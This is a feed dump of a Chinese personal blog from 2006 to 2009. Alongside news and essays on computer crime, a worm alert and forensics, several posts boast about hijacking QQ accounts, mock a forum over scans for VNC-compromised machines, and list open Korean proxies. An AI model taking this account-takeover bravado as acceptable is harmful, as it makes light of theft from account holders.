马骏的BLOG http://blog.sina.com.cn/majun Wed, 30 Dec 2009 13:09:18 GMT+8 FEEDCREATOR_VERSION zh-cn Copyright 1996 - 2009 SINA Inc. All Rights Reserved. Wed, 30 Dec 2009 05:09:18 GMT+8 换服务器之前博客跳转到sina http://blog.sina.com.cn/s/blog_48e51c1a0100c4ch.html 换服务器之前博客跳转到sina

想日的尽可能的尝试一下?

我好不容易才找回来的密码

 

 

有技术是一回事 把技术用于无聊的地方又是一回事

还有

希望有些人嘴巴干净点。

别动不动就问候对方父母的

琢磨着是否是你的父母没教养教出了你这个杂种

]]> 马骏 http://blog.sina.com.cn/s/blog_48e51c1a0100c4ch.html#comment Sun, 15 Feb 2009 19:17:14 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a0100c4ch.html 广州网站制作公司-新定律 http://blog.sina.com.cn/s/blog_48e51c1a01000cdp.html   广州网站制作公司-新定律,属于公司创新的定律。

  以往网站都追寻常规的定律,而一个好的网站建设公司,应该有他独到的定律。广州网站建设新定律-抵制垃圾建站,维护客户平衡。

  抵制垃圾建站,维护客户平衡:

  毋庸质疑,垃圾建站是一些网站建设公司的通病,以价格来权衡程序与设计。使得网站漏洞重重,设计华而不实。广州网站建设将抵制这种做发,切身实地的为客户考虑。以程序员的标准编写好网站程序。

  新公司,新定律。广州网站建设-抵制垃圾建站,维护客户平衡

]]> 马骏 新闻 http://blog.sina.com.cn/s/blog_48e51c1a01000cdp.html#comment Wed, 17 Oct 2007 22:27:26 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a01000cdp.html 广州网站建设 http://blog.sina.com.cn/s/blog_48e51c1a01000ccc.html  

  广州网站建设 - 致力于在全球互联网上建设网络平台,于广州网站建设广州网站制作广州网站优化 为一体。用各种网络设计技术,为企事业单位、公司和个人在全球互联网上建设网络平台。
  广州网站建设 -以人为本,在广州网站建设广州网站制作广州网站优化 上拥有多年的经验,并且由具有丰富实际一线工作经验的IT工程师、设计工程师、传播工程师,赢得了顾客的广泛信任与真诚赞誉。
  广州网站建设 - 对域名有独特的领悟能力,配合SEO建站技术,在前期的网站策划与市场分析中能快速的为客户树立公司的形象,建立领先同业的战略优势。运用先进的传播扩展手段,增大公司的用户数量。结合第一、二、三代网站建设技术,由专业的程序员进行编译,从而让网站更进一步的人性化。所谓的第一、二、三代网站建设技术是指:
  第一代网站建设技术:运用一般的网页制作软件,把一些平面页面效果转化成网页,然后把网页链接起来成为一个企业网站。
  第二代网站建设技术:是指在第一代网站建设技术基础上,针对网站的某一个功能采用一些数据库管理模块(如新闻发布、产品发布等),网站的后台对这些个别的功能模块进行管理。
  第三代网站建设技术:2003年初以来出现了第三代网站建设技术――智能建站系统。网站用户通过智能建站系统能够很方便快捷地管理自己的网站,自己定义网站的框架内容,并能够随时升级网站的功能,且解决了每个客户都需要的网站前台界面个性化的需求。
  然而在广州网站建设程序员的研究之下,发觉一、二、三代都存在很多缺点,并且不够人性化,惟独自己开发程序才能符合企业的要求,达到企业营销的效果,而广州网站建设 - 本着以广州网站建设广州网站制作广州网站优化 为目标,在广州区域为客户建立最人性化的网络平台。

]]> 马骏 http://blog.sina.com.cn/s/blog_48e51c1a01000ccc.html#comment Mon, 15 Oct 2007 03:54:15 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a01000ccc.html 天使羽翼黑 http://blog.sina.com.cn/s/blog_48e51c1a01000bvx.html  天使羽翼黑  by 马骏 ]]> 马骏 心情 http://blog.sina.com.cn/s/blog_48e51c1a01000bvx.html#comment Sat, 15 Sep 2007 14:48:09 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a01000bvx.html 呼呼~ 要换blog咯 hoho~ 这个blog可能不更新了 http://blog.sina.com.cn/s/blog_48e51c1a010005sw.html 呼呼~ 要换blog咯 hoho~ 这个blog可能不更新了呼呼~ 要换blog咯 hoho~ 这个blog可能不更新了呼呼~ 要换blog咯 hoho~ 这个blog可能不更新了呼呼~ 要换blog咯 hoho~ 这个blog可能不更新了
 
 换到
www.11306.com
大家也来注册吧
速度很快 呵呵
]]> 马骏 http://blog.sina.com.cn/s/blog_48e51c1a010005sw.html#comment Wed, 23 Aug 2006 19:29:29 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a010005sw.html 天门"黑客"攻破腾讯QQ网站 窃取网络虚拟财产 http://blog.sina.com.cn/s/blog_48e51c1a010005np.html     昨日记者获悉,天门市警方近日成功破获“黑客”攻击腾讯公司案,天门籍犯罪嫌疑人鄢某被成功抓获。

    前不久,天门市公安局网监大队接到报案,腾讯公司(网络即时通讯工具QQ的运营公司)称近期发现公司内部OA管理系统、客服系统、虚拟币卡管理系统、游戏后台管理系统等约八十个系统被人非法入侵,内部13台服务器还被设置木马病毒,该公司计算机信息系统被严重破坏。

    随后,天门网警从多个方面开展工作,并迅速查实,该攻击来自天门市互联网上网用户。网警充分利用先进的侦查技术手段,查找犯罪嫌疑人的蛛丝马迹和作案证据。8月8日晚,天门市干驿镇鄢某再次上网作案时,被警方当场抓获。

    经审讯,今年7月份以来,鄢某利用自己发现的腾讯的系统漏洞,非法侵入该公司的计算机信息系统,并通过数据流侦听的方式,逐步取得公司域密码及其他重要资料,进而取得多台服务器及PC机的控制权限,以及OA管理系统、客服系统、虚拟币卡管理系统、游戏后台管理系统等多个系统数据库的超级用户权限,在13台服务器中植入木马程序,并利用所获得的数据库管理权限,先后修改多个用户号码的密码及密码保护资料,窃取了价值较大的网络虚拟财产。

    鄢某同时将其入侵的过程完整地进行记录,通过打电话和发短信的方式向腾讯公司及其总裁进行敲诈勒索。

    警方介绍,根据《刑法》相关规定,鄢某涉嫌构成破坏计算机信息系统罪被刑事拘留。目前,案件还在进一步审理中。(完)(记者 季动)

PS
我听人说过
客服MM的机器被人下了鸽子
  如果是那样
那客服MM惨了
]]> 马骏 新闻 http://blog.sina.com.cn/s/blog_48e51c1a010005np.html#comment Wed, 16 Aug 2006 11:10:06 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a010005np.html 昨天玩了一天游戏~补发个消息 http://blog.sina.com.cn/s/blog_48e51c1a010005n9.html 1945年8月15日,日本裕仁天皇宣布无条件投效,日本政府代表重光葵签字投降。这是值得每一个中国人牢记的一天。只有祖国的强盛才有人民的安康。中华人民共和国万岁~
                                                         hacked by 马骏
                                                       2006年8月16日凌晨
]]> 马骏 心情 http://blog.sina.com.cn/s/blog_48e51c1a010005n9.html#comment Tue, 15 Aug 2006 20:39:46 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a010005n9.html 06年首次三级警报:"魔波"高危病毒! http://blog.sina.com.cn/s/blog_48e51c1a010005mw.html 8月14日上午,瑞星全球反病毒监测网在国内率先截获到两个利用系统高危漏洞进行传播的恶性病毒——“魔波(Worm.Mocbot.a)”和“魔波变种B(Worm.Mocbot.b)病毒。据瑞星客户服务中心统计,目前国内已有数千用户遭受到该病毒攻击。
  瑞星反病毒专家介绍说,该病毒会利用微软MS06-040高危漏洞进行传播。当用户的计算机遭受到该病毒攻击时,会出现系统服务崩溃,无法上网等症状。由于该病毒出现离微软发布补丁程序只有短短几天时间,有很多用户还没有来得及对系统进行更新。

  因此,瑞星发出(三级)安全警报,瑞星反病毒专家预测将会有更多的电脑受到该病毒攻击,“魔波”病毒甚至有可能会像“冲击波”、“震荡波”病毒一样大规模爆发。



(图为系统遭受病毒攻击,出现服务崩溃症状)

  根据分析,“魔波”病毒会自动在网络上搜索具有系统漏洞的电脑,并直接引导这些电脑下载病毒文件并执行。只要这些用户的电脑没有安装补丁程序并接入互联网,就有可能被感染。感染该病毒的计算机会自动连接特定IRC服务器的特定频道,接受黑客远程控制命令。用户的银行卡帐号、密码及其它隐私信息都有可能被黑客窃取。由于病毒连接的IRC服务器在中国镜内,因此该病毒很有可能为国人编写。

  针对此恶性病毒,瑞星已经升级。瑞星杀毒软件2006版18.40.01版及更高版本可彻底查杀此病毒,请广大用户及时。同时,瑞星建议用户开启瑞星个人防火墙2006版,并关闭139及445端口。同时,登陆微软网站下载并安装MS-06-040补丁程序以防范此病毒攻击。遭受到该病毒攻击的用户,也可以拨打反病毒急救电话:010-82678800寻求帮助。
]]> 马骏 安全 http://blog.sina.com.cn/s/blog_48e51c1a010005mw.html#comment Tue, 15 Aug 2006 07:16:21 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a010005mw.html 哦耶耶~大家看我开的QQ hoho~ http://blog.sina.com.cn/s/blog_48e51c1a010005lm.html
还没开完的 呵呵
 里面有2个是圈子里面的人的
 
  我就不动他们的QB和密码了 呵呵
 
点图可以放大看 呵呵
]]> 马骏 心情 http://blog.sina.com.cn/s/blog_48e51c1a010005lm.html#comment Sat, 12 Aug 2006 23:23:21 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a010005lm.html 哦耶~终于找到完全版了 http://blog.sina.com.cn/s/blog_48e51c1a010005li.html
站的更高,尿的更远。水至清则无鱼,人至贱则无敌! 走自己的路,让别人打车去吧。穿别人的鞋,走自己的路,让他们找去吧。打台湾我捐一个月的生活费,打美国我捐一年的生活费, 打日本我捐他妈的一条命! 我不是随便的人,我随便起来不是人。女人无所谓正派,正派是因为受到的引诱不够;男人无所谓忠诚,忠诚是因为背叛的筹码太低…… 骑白马的不一定是王子,可能是唐僧;带翅膀的也不一定是天使,有时候是鸟人。 俺的最低奋斗目标:农妇,山泉,有点田。再过几十年,我们来相会,送到火葬场,全部烧成灰,你一堆,我一堆,谁也不认识谁,全部送到农村做化肥. ]]> 马骏 心情 http://blog.sina.com.cn/s/blog_48e51c1a010005li.html#comment Sat, 12 Aug 2006 18:46:27 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a010005li.html 刚才上动画吧看了一下 http://blog.sina.com.cn/s/blog_48e51c1a010005kk.html  
动画吧的人好牛B啊
 
 一个论坛都是VNC肉鸡
 
一帮傻X
 
扫描的结果都发出来了
 
连接超时的也发出来了
 
 好象人家不知道你会扫VNC似的
 
 
一帮SB
 
]]> 马骏 http://blog.sina.com.cn/s/blog_48e51c1a010005kk.html#comment Fri, 11 Aug 2006 13:06:19 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a010005kk.html 发些代理 韩国的 方便玩跑跑 http://blog.sina.com.cn/s/blog_48e51c1a010005jx.html 125.245.19.253:8080
125.245.186.132:8080
210.125.84.16:3124
210.125.84.15:3128
222.107.184.13:8080
58.121.51.88:8080
59.6.198.7:8080
59.20.62.88:8080
211.38.211.130:8080
221.149.98.173:8080
222.111.122.225:8080
222.116.131.213:8080
58.224.0.204:8080
58.227.159.179:8080
59.15.50.100:8080
59.25.246.110:8080
59.29.195.52:8080
59.31.111.24:8080
210.96.182.151:8080
211.106.97.40:8080
211.181.6.21:8080
211.221.31.165:8080
222.112.206.245:8080
222.120.201.203:8080
211.63.159.134:8080
220.85.178.139:8080
220.126.29.103:8080
221.155.138.19:8080
222.103.94.87:8080
222.103.230.170:8080
59.11.45.141:8080
59.28.67.20:8080
220.124.253.190:8080
61.74.139.240:8080
218.146.46.92:8080
220.94.46.178:8080
221.156.243.193:8080
59.17.178.117:8080
211.106.161.55:8080
218.53.201.189:8080
222.99.231.158:8080
58.120.182.126:8080
211.191.109.12:8080
220.64.190.150:8080
221.155.47.27:8080
58.236.44.52:8080
61.36.79.149:8080
61.40.184.169:8080
211.51.162.44:8080
211.190.100.174:8080
211.208.20.75:8080
211.216.125.32:8080
220.80.118.42:8080
58.72.8.38:8080
61.98.237.151:8080
211.180.116.205:8080
220.124.246.88:8080
221.161.151.157:8080
222.112.19.180:8080
124.28.25.53:8080
58.235.106.132:8080
221.149.229.195:8080
58.75.9.144:8080
211.44.119.106:8080
220.121.133.210:8080
220.127.128.49:8080
210.211.219.130:3128
58.236.238.66:8080
61.251.242.175:8080
58.72.32.254:8080
125.240.110.195:8080
58.140.225.253:8080
58.224.213.106:8080
125.245.20.130:8080
211.176.6.124:8080
211.215.129.58:8080
61.247.114.238:8080
218.52.139.120:8080
221.149.59.96:8080
211.212.224.87:8080
124.53.117.62:8080
220.124.147.67:8080
210.111.46.24:8080
211.208.174.16:8080
211.213.109.161:8080
211.208.250.247:8080
210.211.142.61:3128
125.243.163.67:8080
211.177.88.166:8080
211.177.236.57:8080
211.208.252.228:8080
61.108.37.2:3128
58.226.29.19:8080
222.109.171.147:8080
125.243.207.130:8080
58.230.250.23:8080
211.176.24.16:8080
211.104.149.173:8080
58.143.155.103:8080
211.38.254.174:8080
211.202.142.247:8080
211.187.75.46:8080
]]> 马骏 http://blog.sina.com.cn/s/blog_48e51c1a010005jx.html#comment Thu, 10 Aug 2006 14:46:11 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a010005jx.html 浅谈网络时代计算机犯罪的处罚与预防 http://blog.sina.com.cn/s/blog_48e51c1a010005jt.html 21世纪将是一个以计算机网络为核心的信息时代,数字化、网络化、信息化是21世纪的时代特征,计算机正在人们的工作、学习、生活中正扮演着越来越重要的角色。随着以“计算机网络”为核心的信息技术的迅猛发展,网络在为国家机关提高工作效率、工作质量;为企业带来巨大经济效益和无限商机的同时,也产生了一个新兴的犯罪名词━━计算机犯罪。我国作为一个发展中国家,针对这一高科技犯罪,在立法方面存在一定的滞后,在计算机网络管理和计算机犯罪方面基本上处于无法可依或有法难依的状态。面对计算机犯罪发现难、捕捉难、取证难、定性更难的特点,司法部门如何处理计算机犯罪案件,是一个既紧迫又需长期研究的问题。我国《刑法》中将“破坏计算机信息系统罪”、“非法侵入计算机信息系统罪”列入妨害社会管理秩序罪中,表明了我国在打击计算机犯罪活动的坚决态度。作为一名计算机从业人员,笔者深知计算机犯罪的严重后果,在此对该类犯罪的危害、犯罪对象来源以及该类犯罪在刑法上的疏漏方面谈谈自己的一些肤浅的认识,以达抛砖引玉之目的。
一、计算机犯罪的危害
随着计算机技术的飞速发展,信息网络已经成为社会发展的重要保证。信息网络涉及到国家的政府、军事、文教等诸多领域。其中存贮、传输和处理的信息有许多是重要的政府宏观调控决策、商业经济信息、银行资金转帐、股票证券、能源资源数据、科研数据等重要信息。有很多是敏感信息,甚至是国家机密。计算机犯罪带来的危害主要体现在两个方面:一是国家秘密、商业秘密等文件资料失密;二是对计算机系统进行恶意的破坏。中国的网络事业发展迅速,据不完全统计,我国上网计算机数有六百七十万台,上网用户达到一千六百九十余万。因特网使用人群在中国每年增长比例都超过100%。网民总人数已超过1500万人。网上银行、网上购物等电子商务迅猛发展。政府、企业因特网技术应用出现前所未有的热潮。伴随着网络兴起而来的是计算机犯罪案件也急剧上升,计算机犯罪已经成为普遍的国际性问题。据美国联邦调查局的报告,计算机犯罪是商业犯罪中最大的犯罪类型之一,每笔犯罪的平均金额为45000美元,每年计算机犯罪造成的经济损失高达50亿美元。而计算机犯罪大都具有瞬时性、广域性、专业性、时空分离性等特点。通常计算机罪犯很难留下犯罪证据,这大大刺激了计算机高技术犯罪案件的发生。计算机犯罪案率的迅速增加,使各国的计算机系统特别是网络系统面临着很大的威胁,并成为严重的社会问题之一。根据美国计算机安全协会与联邦调查局的一次联合调查统计,仅该国有53%的企业受到过计算机病毒的侵害,42%的企业的计算机系统在过去的12个月被非法使用过。而五角大楼的一个研究小组称美国一年中遭受的攻击就达25万次之多。 如俄罗斯黑客弗拉基米尔.利文与其伙伴从圣彼得堡的一家小软件公司的联网计算机上,向美国CITYBANK银行发动了一连串攻击,通过电子转帐方式,从CITYBANK银行在纽约的计算机主机里窃取1100万美元。 随着计算机网络的崛起伴随而来的“计算机病毒”,更是让人闻“毒”色变,每年因计算机病毒发作而造成的经济损失更是不可估量。
二、计算机犯罪种类划分和动机概述
黑客(Hacker)本意是指在计算机程序设计领域中,非常熟悉计算机程序设计技术而热衷于编制新程序的电脑迷,而现在逐渐演变为一个未经许可“侵入”计算机程序系统的人,或是怀有恶意破坏计算机程序系统、编制计算机病毒的代称。而计算机黑客则正是计算机犯罪的主要来源。对黑客进入电脑系统的行为,一般可以划分为以下几类:一是“黑客非法侵入”,破坏计算机信息系统;二是网上制作、复制、传播和查阅有害信息,如传播计算机病毒、黄色淫秽图像等;三是利用计算机实施金融诈骗、盗窃、贪污、挪用公款;四是非法盗用使用计算机资源,如盗用帐号、窃取国家秘密或企业商业机密等;五是利用互联网进行恐吓、敲诈等其他犯罪。随着计算机犯罪活动的日益新颖化、隐蔽化,未来还会出现许多其他犯罪形式。从目前我国所破获的计算机犯罪案件中,犯罪嫌疑人普遍都是精通计算机的青年学生。究其犯罪动机,笔者认为有以下二个方面:一是行为人不是出于恶意,而是抱着好玩或显示自身的计算机技术特长,把入侵别人的电脑系统当作是对自己的能力的一种挑战,入侵系统后并不实施破坏行动而退出,可称之为非恶意入侵者。二是行为人故意违反国家规定,入侵电脑系统的目的是窃取商业情报、资料或国家秘密;或为显示自己的能力而制作、传播计算机病毒等破坏程序,导致系统瘫痪,这类黑客可称之为恶意入侵者。
三、我国《刑法》中有关计算机犯罪的规定
1、《刑法》第285条规定的“非法侵入计算机信息系统罪”,该罪是指违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的行为。本罪所侵犯的客体是国家重要计算机信息系统的安全,犯罪对象是国家事务、国防建设、尖端科学技术领域的计算机信息系统。客观方面表现为违反国家规定,侵入上述三类计算机信息系统的行为。而主观方面只能是故意,即明知是该类系统而故意侵入。触犯本罪处三年以下有期徒刑或者拘役。
2、《刑法》第286条规定的“破坏计算机信息系统罪”是指违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,或者对计算机信息系统中存储、处理或传输的数据和应用程序进行删除、修改、增加的操作,或者故意制作、传播计算机病毒等破坏性程序,影响计算机系统正常运行,后果严重的行为。本罪所侵犯的客体是国家对计算机信息系统的管理制度。客观方面表现为行为人违反国家规定,破坏计算机信息系统,且后果严重的行为。主观方面只能是故意。触犯该罪的,处五年以下有期徒刑或者拘役,后果特别严重的,处五年以上有期徒刑。
四、我国《刑法》中有关计算机犯罪刑罚的疏漏
在现代生活中,计算机已经成为人们在信息交流和日常工作中一种十分重要的工具,确保计算机信息系统的正常运行,对稳定正常的社会秩序,发展社会经济有着十分重要的意义。我国已将对计算机犯罪的处罚提高到刑罚处罚的高度,从上述两罪看,其处罚不可谓不重,同时也显视了我国对计算机犯罪行为的处罚力度和决心,但是由于法律的制定具有一定的滞后性,因此在司法实践中对该类犯罪的处罚也存在一定的片面性和局限性。
1、两罪不能涵盖计算机犯罪的全部行为。如:曾轰动一时的上海热线案中,杨某因侵入“上海热线”8台服务器,破译了大部分工作人员和500多个合法用户的帐号和密码,其中包括2台服务器的超级用户帐号和密码,非法窃用该“热线”2000多个小时,杨某被公安机关抓获,以“破坏计算机信息系统罪”逮捕。后公安机关又将强制措施由逮捕改为取保候审。而该案则是一个典型的“三不象”案件,理由是:(1)杨某不构成“非法侵入计算信息系统罪”,根据刑法中对该罪的规定,杨某侵入的是网络服务商的信息系统,而不是国家事务、国防建设、尖端科学技术领域,其犯罪对象与该罪所指犯罪对象不同一,所以不构成该罪。(2)杨某不构成“破坏计算机信息系统罪”。根据该罪的规定,行为人虽然具有删除、修改、并可造成网络瘫痪的能力,但其并未实施该行为,即使实施了该行为,也必须达到刑法所规定的“后果严重”才可以该罪追究其责任。(3)杨某不构成盗窃罪。根据刑法第287条规定,从法理上讲,杨某的行为与盗用长途电话、移动号码实质相同,但在司法实践一般认为该类违法行为所侵犯的对象是通讯用户,而不包括通讯服务提供商,即网络服务商(ISP),刑法第265条中有关盗窃数额计算中,仅涉及电话和移动电话的情况,没有涉及计算机网络的情况,如果扩大解释则尚无明确的法律规定或司法解释,按法无明文规定不为罪原则,只能得出杨某不构成盗窃罪的结论。
2、对“后果严重”一词没有准确的界定标准。如“破坏计算机信息系统罪”中“后果严重”一词的准确界定标准是什么?,达到什么样的后果才称为严重?又如首例黑客入侵证券网络案中,章某为帮朋友炒股搞内幕资料而非法入侵证券公司的电脑系统,拷贝了客户帐号、资金余额等明细资料,章某被抓获后,经审查司法部门认定章某为“无罪”。就该案而言,与前述一案有一些相同之处,那么章某又构不构成“盗窃商业秘密罪”呢?争论的焦点又在于按照刑法规定,要造成重大损失才构成盗窃商业秘密罪,对“后果严重”的含义如何界定,后果严重是否以造成实际的财产损失为唯一的认定依据。对司法机关的“无罪”认定,笔者赞同,理由是:章某有利用计算机盗窃商业机密罪的行为,但并没有构成盗窃商业机密罪。在刑法上,找不到给章定罪的条文,无论我们出于怎样的保护知识经济的良好目的,但法律就是法律,法律要看行为结果的,章某一案中,并未造成谁的经济损失。刑法第219条规定,要给商业秘密之权利人造成重大损失的,才构成该罪。在我们现在的法律解释中,损失指的就是经济损失,现在没有经济损失,怎么定罪呢?
四、打防结合,标本兼治
1、加强立法,从重、从严打击计算机犯罪行为
在依法打击计算机犯罪的过程中,注重加强立法建设。目前针对网络违法犯罪的处罚条款,我国还散见于《刑法》、《民法》、《中华人民共和国计算机信息系统安全保护条例》和《维护互联网安全的决定》等法律、法规中,不够系统、集中,操作起来也比较困难。为更好地依法打击计算机违法犯罪活动,保护网络安全,有必要借鉴发达国家的办法,制定一部专门法律,通过增强其针对性、系统性和可操作性,为依法治理计算机网络违法犯罪提供必要的法律保障。由于互联网作为全球信息交流的纽带,正日益成为重要的社会公共设施,许多信息库连接在网上,很大部分涉及到国家利益和公民财产安全,因此对于计算机犯罪行为应予以严厉的处罚,从而提高犯罪行为的成本。在目前没有专门的法律的情况下,可以考虑采取下列办法解决计算机犯罪定性处罚难的问题:如修改《刑法》第285条规定的“非法侵入计算机信息系统罪”中被侵入的对象从国家事务、国防建设、尖端科学技术领域的计算机信息系统扩大到经济建设、公共信息服务领域。或者是增加“非法操作或无权使用计算机信息系统罪”,以填补两罪之间的空白。
3、加快“网络警察”队伍的配备和建设
因特网的普及与渗透,使“网络警察”的出现成为必然。目前,全国约有20个省、市、自治区正在筹建网络警察队伍。这种新的警察部队的目标之一,是进行网上搜寻,以防范和跟踪在数秒钟之内就能犯下的、几乎不留下任何痕迹的各种不良行为和犯罪活动的幽灵。因此要求“网络警察”必须具有较深厚的计算机知识和专业技能,能紧跟新技术的发展,熟练掌握各种计算机技能。由于互联网上的犯罪行为有时很难在国界上给以准确的划分,所以在反对电脑化犯罪的斗争中,警察的回应和相互配合的速度是最关键的。例如西班牙国家网络警察这支新部队与欧洲其他类似的力量、特别是美国的联邦调查局保持着密切的联系。国家警察也与法国、德国、英国、日本、加拿大和美国等其他调查信息犯罪的警察组织保持着密切的接触。目前在中国,这种跨国界涉嫌网络犯罪也有抬头之势,如不久前spedia.com美国的互联网广告公司涉嫌欺诈中国用户等,中国的网络警察们应尽快走出国门,与全世界的官方反犯罪网络组织建立密切的联系,协同打击计算机犯罪。
4、加强计算机使用人员的安全意识教育
网络安全的保护,事关广大网民的切身利益,单靠公安部门网络警察的打击和防范,还不足以形成保护网络安全的社会化有效机制,只有通过教育广大网民,提高守法意识,增强上网切莫触法网的自觉性,并使网民掌握各种防范计算机违法犯罪的技术,提高其自我保护网络安全的能力,才能从根本上解决好计算机犯罪问题。近年来,我国不断增加的上网族中,有的由于未能注意依法进行网上活动,从而有意无意地侵犯了网络安全。为此,对广大网民特别是初上网者进行必要的避免网络利用不当而误闯法网的守法教育,是十分必要的。例如“黑客”中有些还只是念高中的大孩子,他们出于炫耀心理上网作恶,甚至不明白自己这是在干违法的事,因此在调强计算机的普及的同时,要加强对计算机学习、使用的法制教育,对广大网民进行自我防范计算机犯罪的普及宣传和必要的技术培训。培训中,要注意加大防范计算机违法犯罪技术的比重,并不断根据犯罪新趋势,在网民中有重点地推广一系列网络安全技术,建立网络安全的保障机制
4、提高网络技术和研制新型网络产品,增强系统自我保护能力
由于计算机犯罪是一种高知商犯罪,正如加密与反加密这一矛盾体一样,只有不断的更新技术,研制新型产品,增加网络的自我防护能力,堵塞安全漏洞和提供安全的通信服务,加强关键保密技术如加密路由器技术、安全内核技术、数据加密技术、网络地址转换器技术、身份证认证技术、代理服务技术、防火墙、网络反病毒技术等重点项目的研制和改进,不跟任何计算机犯罪可乘之机,才能营造一个安全有序的虚拟社会。 ]]> 马骏 安全 http://blog.sina.com.cn/s/blog_48e51c1a010005jt.html#comment Thu, 10 Aug 2006 13:14:29 GMT+8 http://blog.sina.com.cn/s/blog_48e51c1a010005jt.html 网络犯罪取证 必须主动出击 http://blog.sina.com.cn/s/blog_48e51c1a010005js.html 有一群人,当你打开QQ聊得天花乱坠时,他躲在你的背后偷窥着你的聊天记录;无论是你的存储还是删除,无论是你上网,还是在潜水,你的每一个行踪,你的每一个私密的文件,他都了如指掌,甚至引诱着你进入一个罪恶的陷阱……

网络江湖险恶,魔高一尺;

有一群人,守望在你背后的背后,当你的计算机受到骚扰、你的利益受到侵犯的时候,他们用超强的技术为你挽回损失;当国家的重要机密被他人窃取时,他们会在第一时间为国家找回被盗的内容……

他们莫测高深,道高一丈。

□锋芒毕露

黑客峰会四川小伙赢得掌声

2006年6月17—18日,全球300多位超级黑客精英会聚北京化工大学会议中心,应邀参加“CCFC2006第二届中国计算机取证技术峰会”,他们是揭开黑客取证技术神秘面纱的幕后高人。

而在这次被称为“黑客峰会”的会议上,最年轻的一名计算机取证专家陈虹宇,幸运的成为了中国计算机取证技术峰会四川惟一的特邀嘉宾,他也是全国最早提出计算机取证主、被动体系的专业人士。

取证必须主动出击

“一旦网络安全出了问题,资源受到破坏的时候,我们应该如何取证?如果按照以前的操作模式,那就只能等到出了事后再采用被动举证。试想如果能够提前对这些可能出现的事故,进行预先监控和防范,那结果又将是如何的?”谈到计算机取证的发展,陈虹宇在作报告时表示,希望我们的取证不要停留在被动取证的时代,而是能够防患于未然的采用主动取证的方式,这样虽然采用提前监控的方式会增加一些成本的投入,不过这和被破坏之后需要恢复所需的成本相比,是微不足道的。这就当相于在每条马路的十字路口装一个摄像头,之后发生了任何交通事故,都可以实时的还原当时的情况,比之后寻找逃逸车辆信息等要容易得多了。最后,他肯定地称,不久后,主动取证将会替代被动取证,其精彩的报告引来了300余名参会“黑客”的热烈掌声。

现状取证专家紧缺

“计算机取证技术的地位就犹如打击街面
犯罪,全球统一战线1陈虹宇在接受记者采访时表示,在一个计算机领域,如果没有专门的取证技术,计算机行业也不可能顺利的发展以及
良好的运行,但在取证方面也存在着相当大的难度。
随着计算机技术应用的普及,网络犯罪也逐渐发生在人们身边。特别是通过“黑客”谋取利益的事情已不足为奇,为了抑制计算机犯罪,除了通过公安机关的监督制止以外,还需要一批专门针对计算机犯罪的事件进行取证调查的专家,但目前这方面的人才不是很多。

□网络警察

现实犯罪与虚拟犯罪相关联

据四川省公安厅公共信息网络安全监查处透露,至1996年深圳发生一起计算机犯罪案以后,每年计算机犯罪案件都在以30%的增长率在递增。省公安厅网监处相关负责人表示,虚拟犯罪与现实犯罪是联系在一起的。

“其实计算机犯罪和现实生活的犯罪是密不可分的,计算机犯罪最终还是要还原到现实生活中去。”网监处副处长张光峰表示,计算机犯罪与现实犯罪的目的是一样的,都是为了谋取某种利益而实施的犯罪,比如通过计算机将某公司的重要客户资料盗走后,再拿这份重要资料来对该公司实施敲诈。

□专家呼吁

计算机法律还需健全

对于计算机犯罪,记者采访了四川省社会科学院社会研究所副所长胡光伟,他表示,自从计算机诞生以来,就颠覆了人类的生活,让人类完全走向了计算机时代,同时,更促进了科技的进步。但在目前,我国对计算机犯罪的准备工作还做得不够。

“比如在计算机未面世以前,偷东西还得跑到别人家里来偷,可是现在的犯罪,逐步走到直接运用计算机就可以实施犯罪了,所以我国对计算机犯罪方面还得加强研究。”对于计算机取证,胡教授认为,现阶段,我国关于计算机犯罪、取证等方面的法律还不太健全,要想完善计算机的各种管理,法制建设必须要跟上。



黑客案例

摄像头自动开启隐私遭偷窥

2006年2月,中央电视台就曾经报道过这样一件离奇的事情,蒙城的杨某夫妇都喜欢上网聊天,2005年9月的一天晚上,杨某夫妇像往常一样打开电脑,眼前的情形却让两人大惊失色———在一个网名叫“坏脾气”的人发来的电子邮件中,内容竟然是他们在家过夫妻生活的镜头!于是夫妻俩随即报了警,经过蒙城县公安局民警现场勘察,排除了其他人在其家中安装摄像头进行偷拍的行为。

一家人私密的活动是如何被偷拍的?就在警方继续调查的时候,“坏脾气”又在网上出现了,并向夫妻俩敲诈5000元现金。通过网上留下的线索,警方锁定了“坏脾气”,在一系列网络技术手段的帮助下,蒙城警方在2005年9月18日将“坏脾气”抓获归案。

原来,在案发一个月前,张某就通过网络下载了一个木马程序,并把这个木马程序挂在一个游戏论坛的网页上面等待网民下载。一旦网民下载并点击的话,木马程序就会自动解压安装到点击人的电脑上面,让张某可以远程控制自己的电脑。“我正好在那个时间段上网,然后浏览那个机器,一台一台看过去,谁会知道那边正好电脑开着,而且正好床对着摄像头,正好他们夫妻正在做这件事,完全是一种巧合。”张某表示。
28万工资被员工盗走

深圳某公司天津分公司负责人肖某的太太到银行取丈夫当月的工资,但银行显示钱并没有到账。肖太太于是打电话回公司查询,财务人员到银行查询后得知该公司从董事长到中、高层管理人员共19人的7月份工资,一共28万余元全都无影无踪了!

警方综合各方面的线索判定,犯罪嫌疑人极有可能是该公司内部员工,并且有很高的电脑网络水平。最后,警方将曾在该公司工作过的、一名叫杜某的男子锁定为重大嫌疑人。此人今年26岁,毕业于某重点大学计算机系,电脑水平高超,获得过美国微软公司的特别认证。12月18日,在摸清犯罪嫌疑人的情况后,专案组千里奔赴长沙,并于当日上午11时将正要外出的杜某堵在了门口。

美国防部遭袭击

1994年,格里菲斯空军基地和美国航空航天局的电脑网络受到两名黑客的攻击。同年,一名黑客用一个很容易得到的密码发现了英国女王、梅杰首相和其他几位军情五处高官的电话号码,并把这些号码公布在互联网上。
